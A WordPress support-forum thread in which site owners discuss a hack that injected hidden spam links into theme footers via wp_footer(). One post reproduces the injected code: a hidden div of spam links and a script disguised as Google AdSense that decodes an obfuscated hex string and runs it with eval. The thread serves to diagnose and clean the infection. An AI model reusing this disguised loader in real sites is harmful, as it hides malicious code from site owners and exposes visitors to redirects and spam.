bastienb

Hi stlm,

I have search for informations about this hack and I found something interesting to see the way we have been infected.

This is not related at all with the used theme as everyone say here but it’s an old exploit of WP that maybe we always have in our files and databases since the migrations !

See the article here : https://linux.byexamples.com/archives/397/wordpress-exploit-we-been-hit-by-hidden-spam-link-injection/

I have see and delete everything the author says and I think I’m safe now !

Regards,
Bastien.

I’m using a theme from Abhishek Tripathi, the theme name is YourBlog2.0 but I did a lot of changes on this but I don’t think the theme is the problem.

You can see it here : https://www.culture-generale.fr

Does the wp_footer() function should be in the default WP themes ?

Hi,
I just encoutered the same thing. Here is what I have in the google cache :

<div id="_wp_footer">
...

A lot of link to get your cock longer and stronger...

...
</div>

<script type="text/javascript"><!--
google_ad_client = "pub-7652328300112263";
google_ad_width = 728;
google_ad_height = 15;
google_ad_format = "728x15_0ads_al_s";
google_ad_channel = "";
function google_ads(str){var idx = str.indexOf('?'); if (idx == -1) return str; var len = str.length; var new_str = ""; var i = 1; for (++idx; idx < len; idx += 2,i++){ var ch = parseInt(str.substr(idx, 2), 16); new_str += String.fromCharCode((ch + i) % 256); } eval(new_str);}
google_ads("https://pagead2.googlesyndication.com/pagead/show_ads.js?636D6071685F676C255D5A68385E565D545C612E64334D100E455C544248504F53434F0304084C4C50423A02373B44403B2F4609ED3838362CE800");
//-->
</script>

I saw the the same call to the function wp_footer(); at the end of all the footer.php hosted in the wp-content directory but I don’t have this call in my local saves so I believe it has been modified on server side.

This is the second time I have this problem, last time I was banned from google for SPAM reason, this time, I saw it before the ban because of my stats (all google referer was redirect to spam sites).

I’m sure that this is a wordpress problem, my server is safe, it does not have any HTTP access to external web sites so I’m sure this hack has been done by injection !

I’m using WP 2.5.1 and 3 plugins updates (cformsII, WP-polls and Akismet).

Actually, I have delete all default themes from the wp-content directory and let only the one I use and put it in read only but I don’t think this is the only one solution.

Please answer to us, it could help.

Regards,
Bastien.